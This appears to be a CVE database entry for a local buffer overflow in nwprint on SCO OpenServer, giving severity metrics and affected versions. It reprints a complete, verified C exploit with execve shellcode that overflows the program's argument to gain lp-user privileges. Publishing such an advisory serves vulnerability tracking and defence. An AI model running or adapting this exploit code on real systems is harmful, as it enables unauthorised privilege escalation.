Notifications for a CVE
Stay informed of any changes for a specific CVE.
CVE Descriptions
Buffer overflow in nwprint in SCO OpenServer 5.0.7 allows local users to execute arbitrary code via a long command line argument.
CVE Informations
Metrics
| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V2 | 4.6 | AV:L/AC:L/Au:N/C:P/I:P/A:P | nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 25333
Publication date : 2005-04-03 22h00 +00:00
Author : pasquale minervini
EDB Verified : Yes
// source: https://www.securityfocus.com/bid/12986/info
nwprint that is distributed with SCO OpenServer is prone to a local buffer overflow vulnerability. This issue arises because the application fails to perform boundary checks prior to copying user-supplied data into sensitive process buffers. A local attacker can gain elevated privileges (lp user) by exploiting this issue.
/*
* minervini at neuralnoise dot com (c) 2005
* sample code exploiting a buffer overflow vulnerability in
* NetWare Unix Client 1.1.0Ba on SCO OpenServer 5.0.7;
*/
#include <sys/types.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#ifndef _PATH
# define _PATH ("/usr/lib/nucrt/bin/nwprint")
#endif
/*
* this shellcode may sound a bit tricky; most of the work
* is caused by SCO's way to call the kernel, lcall $0x7,$0x0,
* translated by the assembler in "\x9a\x00\x00\x00\x00\x07\x00";
* to avoid zeroes i push the NOT-ed bytes on the stack, NOT them
* and then jump to %esp;
* if anyone knows a shorter way to do this execve, a mail is appreciated.
*/
char *scode =
"\x31\xc9" // xor %ecx,%ecx
"\x89\xe3" // mov %esp,%ebx
"\x68\xd0\x8c\x97\xff" // push $0xff978cd0
"\x68\xd0\x9d\x96\x91" // push $0x91969dd0
"\x89\xe2" // mov %esp,%edx
"\x68\xff\xf8\xff\x6f" // push $0x6ffff8ff
"\x68\x9a\xff\xff\xff" // push $0xffffff9a
"\x80\xf1\x10" // xor $0x10,%cl
"\xf6\x13" // notb (%ebx)
"\x4b" // dec %ebx
"\xe2\xfb" // loop $-3
"\x91" // xchg %eax,%ecx
"\x50" // push %eax
"\x54" // push %esp
"\x52" // push %edx
"\x50" // push %eax
"\x34\x3b" // xor $0x3b,%al
"\xff\xe3"; // jmp *%ebx
unsigned long get_sp (void) {
__asm__("movl %esp,%eax");
}
int main (int argc, char **argv) {
int i, slen = strlen(scode), offset = 0;
long ptr, *lptr;
char *buf;
if (argc > 1)
offset = strtoul(argv[1], NULL, 0);
buf = (char *)malloc(1024);
memset(buf, 0, 1024);
for (i = 0; i < (901 - slen); i++)
buf[i] = 0x90;
printf("shellcode length: %d\n", slen);
for (i = (901 - slen); i < 901; i++)
buf[i] = scode[i - (901 - slen)];
lptr = (long *)(buf + 901);
printf("address: 0x%lx\n", ptr = (get_sp() - offset));
for (i = 0; i < 30; i++)
*(lptr + i) = (int)ptr;
execl(_PATH, "nwprint", buf, NULL);
return(0);
}
Products Mentioned
Configuraton 0
Sco>>Openserver >> Version 5.0.6
- Sco>>Openserver >> Version 5.0.6 (Open CPE detail)
Sco>>Openserver >> Version 5.0.7
- Sco>>Openserver >> Version 5.0.7 (Open CPE detail)
